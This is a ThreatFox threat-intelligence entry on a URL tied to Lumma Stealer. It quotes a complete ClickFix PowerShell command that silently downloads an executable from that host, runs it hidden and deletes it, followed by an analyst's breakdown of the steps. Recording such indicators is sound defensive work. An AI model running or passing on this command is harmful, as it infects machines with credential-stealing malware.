ThreatFox IOC Database
You are viewing the ThreatFox database entry for url https://purplefeetwines.monster.
Database Entry
| IOC ID: | 1801915 |
|---|---|
| IOC: | https://purplefeetwines.monster |
| IOC Type : | url |
| Threat Type : | payload_delivery |
| Malware: | Lumma Stealer |
| Malware alias: | LummaC2 Stealer |
| Confidence Level : | Confidence level is high (100%) |
| Is compromised? : | False |
| ASN: | AS214927 PSB-AS |
| Country: | RU |
| First seen: | 2026-04-29 07:49:22 UTC |
| Last seen: | never |
| UUID: | 5caebc3a-4375-11f1-8759-42010aa4000a |
| Reporter | |
| Reward | 5 credits from ThreatFox |
| Tags: | ClickFix ErrTraffic |
YuanGeng
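ClickFix command (as reported): "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command [System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;$c3=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $c3 -Force|Out-Null;$d4=Join-Path $c3 ([System.IO.Path]::GetRandomFileName()+'.exe');$e5=0;for($f6=0;$f6 -lt 3 -and -not $e5;$f6++){try{Invoke-WebRequest -Uri 'https://purplefeetwines.monster/api/index.php?a=dl&token=d857b2ed0bc8ec772b008d08b6e6ef8d4b0f6022ec963f6a92f961e71a324a03&src=recaptcha&cb=chrome&ref=https%3A%2F%2Fzonerealhub.monster%2F&mode=recaptcha' -OutFile $d4 -UseBasicParsing;if(Test-Path $d4){$e5=1}else{Start-Sleep -Seconds 2}}catch{Start-Sleep -Seconds 2}};if(-not (Test-Path $d4)){exit};Start-Process -FilePath $d4 -WindowStyle Hidden;try{Remove-Item -LiteralPath $d4 -Force -ErrorAction SilentlyContinue}catch{};
Observed behaviour, read from the command itself: powershell.exe runs with -NoProfile and a hidden window, creates a randomly named directory under %TEMP%, makes up to three attempts to download a randomly named .exe into it with Invoke-WebRequest, starts that file with a hidden window, and then tries to delete it. The URL-encoded ref parameter names a second host, zonerealhub.monster, apparently the page that served the lure, so it is worth reviewing alongside this entry.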
RU